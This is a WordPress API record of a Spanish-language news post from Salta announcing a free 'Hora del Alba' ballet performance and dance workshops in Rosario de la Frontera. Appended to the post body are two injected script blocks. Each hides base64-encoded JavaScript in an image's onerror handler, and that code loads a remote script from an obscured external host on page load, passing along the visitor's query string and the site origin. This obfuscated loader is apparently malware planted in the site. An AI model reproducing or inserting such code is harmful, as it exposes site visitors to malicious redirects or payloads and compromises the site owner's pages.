{"id":4932,"date":"2025-03-07T10:09:57","date_gmt":"2025-03-07T13:09:57","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4932"},"modified":"2025-08-13T23:39:08","modified_gmt":"2025-08-14T02:39:08","slug":"se-realizara-una-funcion-especial-de-hora-del-alba-en-rosario-de-la-frontera","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4932","title":{"rendered":"Se realizar\u00e1 una funci\u00f3n especial de \u201cHora del Alba\u201d en Rosario de la Frontera"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-cbdb7cbdab8c3577ffffcccfcef0e4c7\" style=\"background-color:#6b0440\"><em>El s\u00e1bado 8 de marzo a las 22:00, el Nuevo Cine Teatro G\u00fcemes (G\u00fcemes 247) ser\u00e1 el escenario de una funci\u00f3n especial de Hora del Alba, con entrada libre y gratuita.<\/em><\/h3>\n\n\n\n<p>El Ballet Folkl\u00f3rico de Salta, Gral. Mart\u00edn Miguel de G\u00fcemes, se presentar\u00e1 en Rosario de la Frontera con esta destacada obra, ganadora del premio a Mejor Obra 2023 en los Premios Ch\u00facaro y vista por m\u00e1s de 5.000 espectadores.<br><br>La puesta en escena establece un di\u00e1logo con los 40 a\u00f1os de democracia en Argentina, invitando a la reflexi\u00f3n sobre la historia y el presente a trav\u00e9s del arte.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16269-se-realizara-una-funcion-especial-de-hora-del-alba-en-rosario-de-la-frontera.webp\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/16269-se-realizara-una-funcion-especial-de-hora-del-alba-en-rosario-de-la-frontera.webp\" alt=\"Se realizar\u00e1 una funci\u00f3n especial de \u201cHora del Alba\u201d en Rosario de la Frontera\"\/><\/a><\/figure>\n\n\n\n<p>Adem\u00e1s, ese mismo d\u00eda se ofrecer\u00e1n capacitaciones gratuitas en el Complejo Municipal de Rosario de la Frontera (Microestadio Deportivo Municipal, Jos\u00e9 Mar\u00eda Paz s\/n), abiertas a todo el p\u00fablico. Las actividades comenzar\u00e1n a las 11:00 con una clase sobre preparaci\u00f3n f\u00edsica aplicada a la danza folkl\u00f3rica e introducci\u00f3n a las danzas tradicionales.<br><br>A las 12:30, se abordar\u00e1 la estilizaci\u00f3n folkl\u00f3rica y su integraci\u00f3n con otros lenguajes art\u00edsticos, como la danza contempor\u00e1nea, la expresi\u00f3n corporal y el teatro. Finalmente, a las 14:00 se dictar\u00e1 una capacitaci\u00f3n dedicada al tango.<\/p>\n\n\n\n<p>Las personas interesadas pueden inscribirse a trav\u00e9s de los tel\u00e9fonos 3876-561941 \/ 3876-530592 o enviando un correo a ncteatroguemes@gmail.com. Tambi\u00e9n podr\u00e1n anotarse en la boleter\u00eda del Nuevo Cine Teatro G\u00fcemes (G\u00fcemes 247) en los horarios de 7:00 a 13:00 y de 18:00 a 21:00.<\/p>\n\n\n\n<p>Esta propuesta busca acercar la cultura y la formaci\u00f3n art\u00edstica a toda la comunidad, fortaleciendo el v\u00ednculo entre el arte, la historia y la identidad.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El s\u00e1bado 8 de marzo a las 22:00, el Nuevo Cine Teatro G\u00fcemes (G\u00fcemes 247) ser\u00e1 el escenario de una funci\u00f3n especial de Hora del Alba, con entrada libre y gratuita. El Ballet Folkl\u00f3rico de Salta, Gral. Mart\u00edn Miguel de G\u00fcemes, se presentar\u00e1 en Rosario de la Frontera con esta destacada obra, ganadora del premio [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4933,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-4932","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4932"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4932"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4932\/revisions"}],"predecessor-version":[{"id":6553,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4932\/revisions\/6553"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4933"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4932"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4932"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4932"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}